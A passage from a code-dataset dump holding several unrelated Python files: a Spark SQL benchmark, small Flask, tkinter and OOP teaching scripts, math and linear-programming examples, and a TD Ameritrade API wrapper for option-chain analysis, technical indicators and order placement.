object_storage_service.GetObjectStorageClass(FLAGS.cloud)()\n dst_url = '{prefix}{uri}'.format(\n prefix=dpb_service_instance.PERSISTENT_FS_PREFIX, uri=run_uri)\n for dir_name, _, files in os.walk(query_dir):\n for filename in files:\n match = re.match(r'q?([0-9]+)a?.sql', filename)\n if match:\n query_id = match.group(1)\n query = '{}.sql'.format(query_id)\n src_url = os.path.join(dir_name, filename)\n storage_service.Copy(src_url, os.path.join(dst_url, query))\n\n src_url = data.ResourcePath(SPARK_TABLE_SCRIPT)\n storage_service.Copy(src_url, dst_url)\n benchmark_spec.base_dir = dst_url\n\n stdout = storage_service.List(FLAGS.dpb_sparksql_data)\n\n for table_dir in stdout.split('\\n'):\n # The directory name is the table name.\n if not table_dir:\n continue\n table = re.split(' |/', table_dir.rstrip('/')).pop()\n stats = dpb_service_instance.SubmitJob(\n pyspark_file=os.path.join(dst_url, SPARK_TABLE_SCRIPT),\n job_type=BaseDpbService.PYSPARK_JOB_TYPE,\n job_arguments=[FLAGS.dpb_sparksql_data, table])\n logging.info(stats)\n if not stats['success']:\n logging.warning('Creates table %s from %s failed', table, table_dir)\n\n\ndef Run(benchmark_spec):\n \"\"\"Runs Spark SQL.\n\n Args:\n benchmark_spec: Spec needed to run the Spark SQL.\n\n Returns:\n A list of samples, comprised of the detailed run times of individual query.\n \"\"\"\n dpb_service_instance = benchmark_spec.dpb_service\n metadata = benchmark_spec.dpb_service.GetMetadata()\n\n results = []\n total_wall_time = 0\n total_run_time = 0\n unit = 'seconds'\n for query_number in FLAGS.dpb_sparksql_order:\n query = '{}.sql'.format(query_number)\n stats = dpb_service_instance.SubmitJob(\n None,\n None,\n query_file=os.path.join(benchmark_spec.base_dir, query),\n job_type=BaseDpbService.SPARKSQL_JOB_TYPE)\n logging.info(stats)\n metadata_copy = metadata.copy()\n metadata_copy['query'] = query\n if stats[dpb_service.SUCCESS]:\n run_time = stats[dpb_service.RUNTIME]\n wall_time = run_time + stats[dpb_service.WAITING]\n results.append(\n sample.Sample('sparksql_wall_time', wall_time, unit, metadata_copy))\n results.append(\n sample.Sample('sparksql_run_time', run_time, unit, metadata_copy))\n total_wall_time += wall_time\n total_run_time += run_time\n results.append(sample.Sample(\n 'sparksql_total_wall_time', total_wall_time, unit, metadata))\n results.append(sample.Sample(\n 'sparksql_total_run_time', total_run_time, unit, metadata))\n return results\n\n\ndef Cleanup(_):\n \"\"\"Cleans up the Spark SQL.\"\"\"\n pass\n","sub_path":"perfkitbenchmarker/linux_benchmarks/dpb_sparksql_benchmark.py","file_name":"dpb_sparksql_benchmark.py","file_ext":"py","file_size_in_byte":6866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"588186031","text":"#Team Random: Ethan Machleder, Mary Shang, Jessica Yeung\n#SoftDev\n#K10: Putting Little Pieces Together\n#2020-10-10\n\nfrom flask import Flask\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef hello_world():\n print(__name__) #prints _main_ in the terminal\n return \"No hablo queso!\" #prints \"No hablo queso!\" on the webpage in plain text\n\napp.run() \n","sub_path":"10_flask01/v0/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"572326878","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"objeto pessoa\"\"\"\n\n__author__ = \"Jacson F. Heiderscheidt\"\n__copyright__ = \"Copyright 2021, Allpy Project\"\n__credits__ = [\"JFH\"]\n__license__ = \"GPL\"\n__version__ = \"0.0.1\"\n__maintainer__ = \"JFH\"\n__email__ = \"jacsonfh@gmail.com\"\n__status__ = \"Estudo de POO\"\n\nfrom datetime import datetime\n\nclass Pessoa:\n ano_atual = int(datetime.strftime(datetime.now(), '%Y')) #Variável da Classe.\n\n def __init__(self, nome, idade, comendo = False, falando = False): #Variáveis da Instância.\n self.nome = nome\n self.idade = idade\n self.comendo = comendo\n self.falando = falando\n\n def falar(self, assunto):\n if self.comendo:\n print(f'{self.nome} não pode falar comendo.')\n return\n\n if self.falando:\n print(f'{self.nome} já está falando.')\n return\n\n print(f'{self.nome} está falando sobre {assunto}.')\n self.falando = True\n\n def parar_falar(self):\n if not self.falando:\n print(f'{self.nome} não está falando.')\n return\n\n print(f'{self.nome} parou de falar.')\n self.falando = False\n\n def comer(self, alimento):\n if self.comendo:\n print(f'{self.nome} já está comendo.')\n return\n\n if self.falando:\n print(f'{self.nome} não pode comer falando.')\n return\n\n print(f'{self.nome} está comendo {alimento}.')\n self.comendo = True\n \n def parar_comer(self):\n if not self.comendo:\n print(f'{self.nome} não está comendo.')\n return\n \n print(f'{self.nome} parou de comer.')\n self.comendo = False\n return\n\n def get_ano_nascimento(self):\n return self.ano_atual - self.idade\n\n","sub_path":"poo/pessoa.py","file_name":"pessoa.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"405716984","text":"'''\nCreated on Oct 28, 2012\n\n@author: Andrii\n'''\nfrom tkinter import *\nroot = Tk()\nwidget = Label(root)\nwidget.config(text = 'Hey GUI!')\nwidget.pack(side=TOP, expand=YES, fill=BOTH)\nroot.title('gui1g.py')\nroot.mainloop()","sub_path":"gui1g.py","file_name":"gui1g.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"303945678","text":"import numpy as np\n\ndef randQuad(n):\n A = np.random.randn(n,n) #random matrix A\n B = A.T\n Q = np.matmul(B,A) # Symmetric positive definite matrix\n b = np.random.randn(n,1) #random vector b\n return [Q,b]\n\ndef myQuad(x, Q, b):\n r = ((x.T) @ Q @ x) - ((b.T) @ x) #value of gradient at x\n g = (Q @ x) - b # gradient vector at x\n return [r,g]\n\ndef myPerm(x):\n n = x.size\n r = 0\n for i in range(1, n+1):\n inner = 0\n for j in range(1, n+1):\n inner += (j + 10) * ((pow(x[j-1], i) - (1/pow((j), i)))) #value of perm function at x[i-1] (since index starts at 1)\n r += pow(inner, 2)\n\n # I understand that my current implementation of computing the gradient is incorrect\n g = np.zeros(n)\n for i in range(1, n+1):\n lhs = 0\n rhs = 0\n for j in range(1, n+1):\n lhs += (j + 10) * ((pow(x[j-1], i) - (1/pow((j), i)))) #first part of the chain rule\n rhs += (j+10) * (i * pow(x[j-1], i-1)) #second part of the chain rule\n g[i-1] = 2 * lhs * rhs\n return [r, g]","sub_path":"mcs435_(nonlinear_optimization)/Assignment_1/venv/Assignment1.py","file_name":"Assignment1.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"529867012","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 27 11:22:18 2019\n\n@author: Sam\n\nSolving the HiTech problem in PuLP\n\n\"\"\"\n#import sys \n#sys.modules[__name__].__dict__.clear()\n\n#%%\nclear()\nfrom pulp import *\npulp.pulpTestAll() # testing pulp\n\n#%%\nprob = LpProblem(\"HiTech\",LpMaximize) # create an LP maximization problem\nx_A = LpVariable(\"x_A\",lowBound=0) # create a variable x_A>=0\nx_B = LpVariable(\"x_B\",lowBound=0) # create a variable x_B>=0\nprob += 20*x_A + 30*x_B # objective function\nprob += x_A >= 25 # contractual commitement\nprob += 4*x_A + 3*x_B <= 240 # assembly hours\nprob += 1*x_A + 2*x_B <= 140 # testing hours\nprob # display the LP problem\n#%%\nstatus = prob.solve() # solve with default solver\nLpStatus[status] # print the solution status\n#%%\nfor v in prob.variables():\n print(v.name, \"=\", v.varValue)\nprint(\"Total Cost = \", value(prob.objective))\n","sub_path":"LP_HiTech.py","file_name":"LP_HiTech.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"259127129","text":"# -*- coding: utf-8 -*-\n\n\ndef levenshtein(a, b):\n \"\"\" Calculates the Levenshtein distance between a and b.\n from http://hetland.org/coding/python/levenshtein.py\n\n For other implementations, see\n http://en.wikibooks.org/wiki/Algorithm_Implementation/Strings/Levenshtein_distance\n \"\"\"\n n, m = len(a), len(b)\n if n > m:\n a, b = b, a\n n, m = m, n\n current = range(n + 1)\n for i in range(1, m + 1):\n previous, current = current, [i] + [0] * n\n for j in range(1, n + 1):\n add, delete = previous[j] + 1, current[j - 1] + 1\n change = previous[j - 1]\n if a[j - 1] != b[i - 1]:\n change = change + 1\n current[j] = min(add, delete, change)\n return current[n]\n","sub_path":"fin_sanctions/lev.py","file_name":"lev.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"652315188","text":"# Last update 6-9 to update our refresh key\n\nimport os\nimport time\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport plotly.graph_objs as go\nfrom plotly.subplots import make_subplots\nfrom plotly.colors import n_colors\nfrom textwrap import dedent as d\n\nimport pandas as pd #Pandas-- data framework\nimport numpy as np #Numpy-- logic framework\n# import scipy #SciPy-- scientific function/ math framework\nimport datetime #for writing out unique files\nimport sys #Supports pick up of files from directories\nimport math\nimport time\nimport json\nimport ciso8601\nimport requests\n\nimport warnings\nwarnings.filterwarnings('ignore')\npd.set_option('display.max_columns', 500)\n\nimport urllib\nclass TDAmeritrade:\n\n def __init__(self, refresh_token=None, consumer_key=None, access_token=None):\n if refresh_token != None:\n self.refresh_token = refresh_token\n else:\n self.refresh_token = pd.read_csv('refresh_key.csv').at[0,'refresh_token'] # Grab the latest - will be switched to memsql query later\n\n if consumer_key != None:\n self.consumer_key = consumer_key\n else:\n self.consumer_key = '#########' # Hardcoded for October2020\n\n self.access_token_timer = round(time.time()) + 1800\n if access_token != None:\n self.access_token = access_token\n else:\n self.access_token = self.get_refresh_key()['access_token']\n\n\n def get_refresh_key(self, new_refresh=False):\n# https://developer.tdameritrade.com/authentication/apis/post/token-0\n self.check_token_time()\n\n refresh_token=self.refresh_token\n consumer_key=self.consumer_key\n\n headers = {'Content-Type': 'application/x-www-form-urlencoded'}\n\n if new_refresh == True:\n body = {\n \"grant_type\": \"refresh_token\",\n \"refresh_token\": refresh_token,\n \"access_type\": 'offline',\n \"client_id\": '{}@AMER.OAUTHAP'.format(consumer_key), #(yes, add \"@AMER.OAUTHAP\" without quotes)\n }\n else:\n body = {\n \"grant_type\": \"refresh_token\",\n \"refresh_token\": refresh_token,\n \"client_id\": '{}@AMER.OAUTHAP'.format(consumer_key), #(yes, add \"@AMER.OAUTHAP\" without quotes)\n }\n\n r = requests.post('https://api.tdameritrade.com/v1/oauth2/token', data=body, headers=headers)\n\n r2 = r.json()\n\n r2['create_ts'] = round(time.time())\n\n return r2\n\n def check_token_time(self):\n if self.access_token_timer <= time.time():\n self.update_access_token()\n return\n\n def update_access_token(self):\n self.access_token_timer = round(time.time()) + 1800\n self.access_token = self.get_refresh_key()['access_token']\n\n\n def save_refresh_key(self):\n d_ = self.get_refresh_key(new_refresh=True)\n pd.DataFrame.from_dict(d_, orient='index').to_csv('refresh_key.csv')\n\n\n def get_option_chain(self, body):\n# https://developer.tdameritrade.com/option-chains/apis/get/marketdata/chains#\n self.check_token_time()\n\n headers = {'Content-Type': 'application/json', 'Authorization':'Bearer {}'.format(self.access_token)}\n\n body['apikey'] = self.consumer_key\n\n request_str = 'https://api.tdameritrade.com/v1/marketdata/chains?apikey={apikey}'.format(apikey=self.consumer_key)\n\n for k in body.keys():\n v = body[k]\n if v != '':\n add_s = '&{k}={v}'.format(k=k,v=v)\n request_str += add_s\n\n r = requests.get(request_str, headers=headers)\n\n r2 = r.json()\n\n return r2\n\n def get_price_history(self, symbol, body):\n# https://developer.tdameritrade.com/price-history/apis/get/marketdata/%7Bsymbol%7D/pricehistory\n self.check_token_time()\n\n # Need to add alot of settings to this one - check the url\n\n headers = {'Content-Type': 'application/json', 'Authorization':'Bearer {}'.format(self.access_token)}\n\n request_str = 'https://api.tdameritrade.com/v1/marketdata/{symbol}/pricehistory?apikey={apikey}'.format(apikey=self.consumer_key, symbol=symbol)\n\n for k in body.keys():\n v = body[k]\n if v != '':\n add_s = '&{k}={v}'.format(k=k,v=v)\n request_str += add_s\n\n r = requests.get(request_str, headers=headers)\n\n r2 = r.json()\n\n return r2\n\n\n def get_quotes(self, symbol):\n\n self.check_token_time()\n\n headers = {'Content-Type': 'application/json', 'Authorization':'Bearer {}'.format(self.access_token)}\n\n if len(symbol) == 1:\n symbol = symbol[0]\n r = requests.get('https://api.tdameritrade.com/v1/marketdata/{symbol}/quotes?apikey={apikey}'.format(apikey=self.consumer_key, symbol=symbol))\n else:\n s = ''\n for sym in symbol:\n s = s + sym + ','\n\n s = s[:-1]\n symbols = urllib.parse.quote(s)\n\n r = requests.get('https://api.tdameritrade.com/v1/marketdata/quotes?apikey={apikey}&symbol={symbol}'.format(apikey=self.consumer_key, symbol=symbols))\n r2 = r.json()\n\n return r2\n\n\n ### Lets define some custom sell functions ###\n def limit_trailing_sell(self, symbol, min_price, trail_amt, perc=False):\n\n ## Get quote data from symbol\n\n# max_price = max(prices)\n\n# if max_price >= min_price: # Enter the sell logic\n\n# # Compare if we have trailed enough to sell\n\n# if perc!=False: # It's a percent trail\n# trail_amt = max_price*(trail_amt/100)\n\n# sell_price = max_price - trail_amt\n\n# if current_price <= sell_price:\n\n# self.execute_trade(symbol, price, etc...)\n\n\n\n\n return\n\n def days_to_exp(self, exp_date, curr_date):\n\n if (type(exp_date) == int) or (type(exp_date) == float):\n\n diff = (exp_date/1000) - (curr_date/1000)\n\n else:\n\n exp_date = str(exp_date)[0:10] + ' 15:00:00'\n diff = time.mktime(datetime.datetime.strptime(exp_date, \"%Y-%m-%d %H:%M:%S\").timetuple()) - (curr_date/1000)\n\n r = (diff/60/60/24)\n\n return r\n\n\n def get_option_chain_df(self, body):\n\n oc = self.get_option_chain(body)\n\n call_data = oc['callExpDateMap']\n put_data = oc['putExpDateMap']\n und_price = oc['underlyingPrice']\n\n call_df = pd.io.json.json_normalize(call_data).melt()\n put_df = pd.io.json.json_normalize(put_data).melt()\n\n call_df['value'] = call_df['value'].apply(lambda x: x[0])\n put_df['value'] = put_df['value'].apply(lambda x: x[0])\n\n\n call_df2 = pd.io.json.json_normalize(call_df['value'])\n put_df2 = pd.io.json.json_normalize(put_df['value'])\n\n rdf = pd.concat([call_df2, put_df2], ignore_index=True)\n rdf['underlyingPrice'] = und_price\n rdf['und_symbol'] = body['symbol']\n\n\n rdf['expirationDateStr'] = pd.to_datetime(rdf['expirationDate'],unit='ms')\n rdf['expirationDateStr'] = rdf['expirationDateStr'].apply(lambda x: str(x)[0:10])\n\n rdf['dte_calc'] = rdf.apply(lambda row: self.days_to_exp(row['expirationDate'], row['quoteTimeInLong']),axis=1)\n\n\n return rdf\n\n\n def calc_profit(self, sell_price, buy_price, strike, volume, type_):\n\n if type_ == 'PUT':\n profit = max(((strike - (sell_price-buy_price))*volume), -1*buy_price*volume)\n else:\n profit = max((((sell_price-buy_price)-strike)*volume), -1*buy_price*volume)\n\n return profit\n\n\n def bulk_calc_profit_df(self, df_, sell_price, volume):\n\n df_['profit'] = df_.apply(lambda row: self.calc_profit(sell_price, row['ask'], row['strikePrice'], volume, row['putCall']),axis=1)\n df_['sell_price'] = sell_price\n\n return df_\n\n def generate_option_symbols(self, underlying, strikes, dates, types='both'):\n\n if types=='both':\n typelist = ['C', 'P']\n elif types=='PUT':\n typelist = ['P']\n elif types=='CALL':\n typelist = ['C']\n\n symbol_list = []\n for k in strikes:\n for d in dates:\n for t in typelist:\n s = '{und}_{date}{t}{strike}'.format(und=underlying, date=d,t=t,strike=k)\n symbol_list.append(s)\n\n return symbol_list\n\n def execute_trade_equity(self, order_type, price, qty, buysell, symbol, duration='DAY'):\n\n self.check_token_time()\n\n headers = {'Content-Type': 'application/json', 'Authorization':'Bearer {}'.format(self.access_token)}\n\n trade_request = {\n 'orderType':order_type,\n \"session\": 'NORMAL',\n \"duration\": duration,\n 'orderStrategyType': 'SINGLE',\n 'orderLegCollection': [{\n \"instruction\": buysell,\n 'quantity': qty,\n 'instrument': {\n 'symbol': symbol,\n 'assetType': 'EQUITY'}\n }]\n }\n\n if order_type == 'LIMIT':\n trade_request['price'] = price\n\n r = requests.post('https://api.tdameritrade.com/v1/accounts/#########/orders', data=json.dumps(trade_request), headers=headers)\n\n return r\n\n def execute_trade_option(self, order_type, price, qty, buysell, symbol, exp_date, putCall, strike, duration='DAY'):\n\n self.check_token_time()\n\n headers = {'Content-Type': 'application/json', 'Authorization':'Bearer {}'.format(self.access_token)}\n\n sym_date = exp_date[5:7]+exp_date[8:]+exp_date[2:4]\n option_symbol = self.generate_option_symbols(symbol, [strike], [sym_date], types=putCall)[0]\n\n\n trade_request = {\n 'orderType':order_type,\n \"session\": 'NORMAL',\n \"duration\": duration,\n 'orderStrategyType': 'SINGLE',\n 'orderLegCollection': [{\n \"instruction\": buysell,\n 'quantity': qty,\n 'instrument': {\n 'symbol': option_symbol,\n 'assetType': 'OPTION',\n \"putCall\": putCall\n }\n }]\n }\n\n if order_type == 'LIMIT':\n trade_request['price'] = price\n\n r = requests.post('https://api.tdameritrade.com/v1/accounts/#########/orders', data=json.dumps(trade_request), headers=headers)\n\n return r\n\n def get_option_chain_flowalgo_db(self, symbol, putCall, strike, exp_date):\n\n self.check_token_time()\n\n headers = {'Content-Type': 'application/json', 'Authorization':'Bearer {}'.format(self.access_token)}\n\n body = {}\n body['apikey'] = self.consumer_key\n body['symbol'] = symbol\n body['contractType'] = putCall\n body['strike'] = strike\n body['fromDate'] = exp_date\n body['toDate'] = exp_date\n\n request_str = 'https://api.tdameritrade.com/v1/marketdata/chains?apikey={apikey}'.format(apikey=self.consumer_key)\n\n for k in body.keys():\n v = body[k]\n if v != '':\n add_s = '&{k}={v}'.format(k=k,v=v)\n request_str += add_s\n\n r = requests.get(request_str, headers=headers)\n\n r2 = r.json()\n\n return r2\n\n def get_option_chain_flowalgo_db_df(self, symbol, putCall, strike, exp_date):\n\n oc = self.get_option_chain_flowalgo_db(symbol, putCall, strike, exp_date)\n\n call_data = oc['callExpDateMap']\n put_data = oc['putExpDateMap']\n und_price = oc['underlyingPrice']\n\n call_df = pd.io.json.json_normalize(call_data).melt()\n put_df = pd.io.json.json_normalize(put_data).melt()\n\n call_df['value'] = call_df['value'].apply(lambda x: x[0])\n put_df['value'] = put_df['value'].apply(lambda x: x[0])\n\n\n call_df2 = pd.io.json.json_normalize(call_df['value'])\n put_df2 = pd.io.json.json_normalize(put_df['value'])\n\n rdf = pd.concat([call_df2, put_df2], ignore_index=True)\n rdf['underlyingPrice'] = und_price\n rdf = rdf.drop('value',axis=1)\n\n return rdf\n\n def get_account_positions(self):\n# https://developer.tdameritrade.com/account-access/apis/get/accounts/%7BaccountId%7D-0\n self.check_token_time()\n\n headers = {'Content-Type': 'application/json', 'Authorization':'Bearer {}'.format(self.access_token)}\n\n acct_url = 'https://api.tdameritrade.com/v1/accounts/#########?fields=positions%2Corders'\n\n r = requests.get(acct_url, headers=headers)\n\n r2 = r.json()\n\n return r2\n\n def get_symbols(self, sym):\n# https://developer.tdameritrade.com/instruments/apis/get/instruments\n self.check_token_time()\n\n headers = {'Content-Type': 'application/json', 'Authorization':'Bearer {}'.format(self.access_token)}\n\n acct_url = 'https://api.tdameritrade.com/v1/instruments?symbol={}&projection=symbol-regex'.format(sym)\n\n r = requests.get(acct_url, headers=headers)\n\n r2 = r.json()\n\n return r2\n\ndef stringify_eid(eids):\n s = ''\n for id_ in eids:\n s += \"'{}',\".format(id_)\n return s[:-1]\n\ndef random_color():\n rgbl=[random.randint(0,255),random.randint(0,255),random.randint(0,255)]\n random.shuffle(rgbl)\n return tuple(rgbl)\n\n\n### GRAPHING AND CALCULATING FUNCTIONS ###\n\ndef rolling_consecutives(s):\n\n cons = 0\n outlist = []\n for i in range(len(s)):\n\n if s[i] == 1:\n cons += 1\n else:\n cons = 0\n\n outlist.append(cons)\n\n return outlist\n\ndef rsi_calc(rs):\n\n try:\n r = 100 - (100 / (1+rs))\n except:\n r = np.nan\n\n return r\n\ndef calc_avgUD(col, n=14):\n\n rlist = [np.nan]*n\n for i in range(n, len(col)):\n\n avg = col[i-n:i].mean()\n rlist.append(avg)\n\n return rlist\n\ndef wilders_smoothing(alpha, val, old_ws):\n\n avgt = (alpha * val) + ((1-alpha) * old_ws)\n\n return avgt\n\ndef calc_avgUD_ws(col, n=14):\n\n rlist = [0]*n\n for i in range(n, len(col)):\n\n avg = wilders_smoothing(1/n, col[i], rlist[i-1])\n rlist.append(avg)\n\n return rlist\n\ndef get_historical_stock_data(tda_function, symbol, startDate, endDate, frequencyType='minute', frequency=1, ext_hours='true', rsi_method='wilders'):\n\n if type(startDate)==str:\n startDate = int(time.mktime(ciso8601.parse_datetime(startDate).timetuple())*1000)\n if type(endDate)==str:\n endDate = int(time.mktime(ciso8601.parse_datetime(endDate).timetuple())*1000)\n if ext_hours==True:\n ext_hours='true'\n\n payload = {'startDate':startDate, 'endDate':endDate, 'frequency':frequency, 'frequencyType':frequencyType, 'needExtendedHoursData':ext_hours}\n if frequencyType not in ['minute', 'hour']: #fkn td documenation blows https://developer.tdameritrade.com/content/price-history-samples\n payload['periodType']='month'\n\n ## We like 45min and 4hr aggs....but we gotta make them oursevles\n if (frequencyType=='minute') and (frequency==45):\n\n payload['frequency'] = 15\n\n rdf_pull = tda_function.get_price_history(symbol, payload)\n rdf = pd.DataFrame(rdf_pull['candles'])\n\n rdf['time_group'] = [round((x+2)/3)*3 for x in rdf.index.values]\n rdf = rdf.groupby('time_group',as_index=False).agg({'open': 'first', 'high':'max', 'low':'min', 'close':'last', 'volume':'sum', 'datetime':'first'}).drop('time_group',axis=1)\n\n elif (frequencyType=='hour'):\n payload['frequency'] = 30\n payload['frequencyType'] = 'minute'\n\n rdf_pull = tda_function.get_price_history(symbol, payload)\n rdf = pd.DataFrame(rdf_pull['candles'])\n\n h=frequency\n h=h*2\n\n rdf['time_group'] = [round((x)//(h))*(h) for x in rdf.index.values]\n rdf = rdf.groupby('time_group',as_index=False).agg({'open': 'first', 'high':'max', 'low':'min', 'close':'last', 'volume':'sum', 'datetime':'first'}).drop('time_group',axis=1)\n\n else:\n\n rdf_pull = tda_function.get_price_history(symbol, payload)\n rdf = pd.DataFrame(rdf_pull['candles'])\n\n rdf['symbol'] = rdf_pull['symbol']\n rdf['date'] = rdf['datetime'].apply(lambda x: datetime.datetime.utcfromtimestamp(x/1000).strftime('%Y-%m-%d %H:%M:%S'))\n rdf['change'] = rdf['close'] - rdf['open']\n rdf['spread'] = rdf['high'] - rdf['low']\n\n rdf['lag_change'] = rdf['change'].shift()\n rdf['change_diff'] = rdf['change'] - rdf['lag_change']\n rdf['spread_diff'] = rdf['spread'].diff()\n\n rdf['neg_change'] = rdf['change'].apply(lambda x : x<0).astype('int')\n rdf['pos_change'] = rdf['change'].apply(lambda x : x>=0).astype('int')\n\n rdf['consec_neg'] = rolling_consecutives(rdf['neg_change'].values)\n rdf['consec_pos'] = rolling_consecutives(rdf['pos_change'].values)\n\n rdf['close_diff'] = rdf['close'].diff()\n rdf['pos_close_diff'] = rdf['close_diff'].apply(lambda x : max(x,0))\n rdf['neg_close_diff'] = rdf['close_diff'].apply(lambda x : abs(min(x,0)))\n\n\n if rsi_method == 'wilders':\n rdf['AvgU'] = calc_avgUD_ws(rdf['pos_close_diff'])\n rdf['AvgD'] = calc_avgUD_ws(rdf['neg_close_diff'])\n else:\n rdf['AvgU'] = calc_avgUD(rdf['pos_close_diff'])\n rdf['AvgD'] = calc_avgUD(rdf['neg_close_diff'])\n\n rdf['RS'] = rdf['AvgU']/rdf['AvgD']\n rdf['RSI'] = rdf['RS'].apply(lambda x: rsi_calc(x))\n rdf = rdf.drop(['close_diff', 'pos_close_diff', 'neg_close_diff', 'AvgU', 'AvgD', 'RS'],axis=1)\n\n return rdf\n\ndef graph_rsi(gdf, rsi_name='RSI', overbought=70, underbought=30):\n\n fig = go.Figure()\n\n fig.add_shape(\n # Line Horizontal\n type=\"line\",\n x0=0,\n y0=overbought,\n x1=400,\n y1=overbought,\n line=dict(\n color=\"red\",\n width=1.5,\n ))\n\n fig.add_shape(\n # Line Horizontal\n type=\"line\",\n x0=0,\n y0=underbought,\n x1=400,\n y1=underbought,\n line=dict(\n color=\"red\",\n width=1.5,\n ))\n\n actual_line = go.Scatter(\n x=gdf.index.values,\n y=gdf[rsi_name],\n mode='lines+markers',\n opacity=0.7,\n fill='tonexty',\n marker={\n 'size': 5,\n 'line': {'width': 0.5, 'color': 'white'}\n }\n )\n\n fig.add_trace(actual_line)\n\n fig.update_layout({'xaxis':{'title': 'minute'},\n 'yaxis':{'title': 'RSI', 'range':[0,100]},\n 'height':300,\n #margin={'l': 40, 'b': 40, 't': 10, 'r': 10, 'pad':4},\n # 'legend':{'x': 0, 'y': 1},\n 'hovermode':'closest'})\n\n fig.update_layout(legend_orientation=\"h\")\n fig.update_layout(legend=dict(x=-.1, y=1.1))\n\n return {'data': fig.data,\n 'layout': fig.layout}\n\ndef plot_candles(df):\n# https://plotly.com/python/candlestick-charts/\n\n fig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n candles = go.Candlestick(x=df['date'],\n open=df['open'],\n high=df['high'],\n low=df['low'],\n close=df['close'],\n name=df.at[0,'symbol'])\n\n fig.add_trace(candles,secondary_y = False)\n\n bar_graph = go.Bar(\n x = df['date'],\n y = df['volume'],\n marker_color='blue',\n opacity=0.5,\n name='Volume'\n )\n\n fig.add_trace(bar_graph,secondary_y = True)\n fig.update_layout(legend_orientation=\"h\")\n fig.update_layout(legend=dict(x=-.1, y=1.1))\n\n return {'data': fig.data,\n 'layout': fig.layout}\n\ndef ema(input_df_, n, xname='close', extra_name = '', return_df=True):\n\n df_ = input_df_.copy()\n sma_col = '{x}{n}day_SMA'.format(n=n, x=extra_name)\n ema_col = '{x}{n}day_EMA'.format(n=n, x=extra_name)\n\n df_[sma_col] = df_[xname].rolling(window=n).mean()\n\n m = (2/ (n+1))\n\n prev_ema = df_[sma_col].dropna().values[0]\n nnans = df_.loc[df_[sma_col].isna()].shape[0]\n\n ema_list = [np.nan]*nnans + [prev_ema]\n\n cdf = df_[[xname, sma_col]].dropna().reset_index(drop=True)\n\n for i in range(1, cdf.shape[0]):\n\n close = cdf.at[i,xname]\n curr_ema = ((close-prev_ema) * m) + prev_ema\n ema_list.append(curr_ema)\n prev_ema = curr_ema\n\n if return_df == True:\n df_[ema_col] = ema_list\n return df_\n\n return ema_list\n\n\ndef graph_options_volume(tda_api, symbol, date, stack_bars=False):\n\n df_ = tda_api.get_option_chain_df({'symbol':symbol, 'fromDate':date, 'toDate':date})\n df_['bid_ask_spread'] = abs(df_['bid'] - df_['ask'])\n\n fig = make_subplots(specs=[[{\"secondary_y\": True}]])\n\n colormap = {'PUT':'red', 'CALL':'green'}\n\n for tn in df_['putCall'].unique():\n gdf = df_.loc[df_['putCall']==tn]\n\n actual_line = go.Scatter(\n x=gdf['strikePrice'],\n y=gdf['bid_ask_spread'],\n text=gdf['strikePrice'],\n mode='lines+markers',\n line=dict(color=colormap[tn]),\n opacity=0.7,\n marker={\n 'size': 5,\n 'line': {'width': 0.5, 'color': 'white'}\n },\n name=(tn),\n )\n\n fig.add_trace(actual_line,secondary_y = False)\n\n bar_graph = go.Bar(\n x = gdf['strikePrice'],\n y = gdf['openInterest'],\n marker_color=colormap[tn],\n opacity=0.5,\n name='Open Interest {}'.format(tn)\n )\n\n fig.add_trace(bar_graph,secondary_y = True)\n\n bar_graph = go.Bar(\n x = gdf['strikePrice'],\n y = gdf['totalVolume'],\n marker_color=colormap[tn],\n opacity=0.3,\n name='Volume {}'.format(tn)\n )\n\n fig.add_trace(bar_graph,secondary_y = True)\n\n if stack_bars == 'True':\n fig.update_layout(barmode='stack')\n\n fig.update_layout({'xaxis':{'title': 'Strike Price'},# 'range':[200,330]},\n 'yaxis':{'title': 'Bid-Ask Spread'},\n 'yaxis2' : {'title':'Volume'},\n 'height':700,\n #margin={'l': 40, 'b': 40, 't': 10, 'r': 10, 'pad':4},\n # 'legend':{'x': 0, 'y': 1},\n 'hovermode':'closest'})\n\n fig.update_layout(title='Options for {sym} with ExpDate {d}'.format(sym=symbol, d=date), title_y = 0.95, title_x=0.5, title_font_size=30)\n fig.update_layout(legend_orientation=\"h\")\n fig.update_layout(legend=dict(x=-.1, y=1.1))\n\n return {'data': fig.data,\n 'layout': fig.layout}\n\ndef itm_calc(putcall, strike, und_price):\n\n if putcall == 'PUT':\n if und_price < strike:\n return True\n return False\n else:\n if und_price < strike:\n return False\n return True\n\ndef max_pain_calc(putcall, strike, und_price, open_int):\n\n if putcall == 'PUT':\n mp = ((strike - und_price) * open_int) * 100\n if putcall == 'CALL':\n mp = ((und_price - strike) * open_int) * 100\n return mp\n\n\ndef calc_max_pain_graph(df_, min_range=0, max_range=420):\n\n df_2 = pd.concat([df_]*(max_range-min_range))\n plist = []\n plen = df_.shape[0]\n for i in range(min_range, max_range):\n p = list(np.ones(plen)*i)\n plist += p\n\n df_2['und_price'] = plist\n\n df_2['ITM'] = df_2.apply(lambda row: itm_calc(row['putCall'], row['strikePrice'], row['und_price']),axis=1)\n df_3 = df_2.loc[df_2['ITM']==True]\n df_3['max_pain_value'] = df_3.apply(lambda row: max_pain_calc(row['putCall'], row['strikePrice'], row['und_price'], row['openInterest']),axis=1)\n df_4 = df_3.groupby(['und_price', 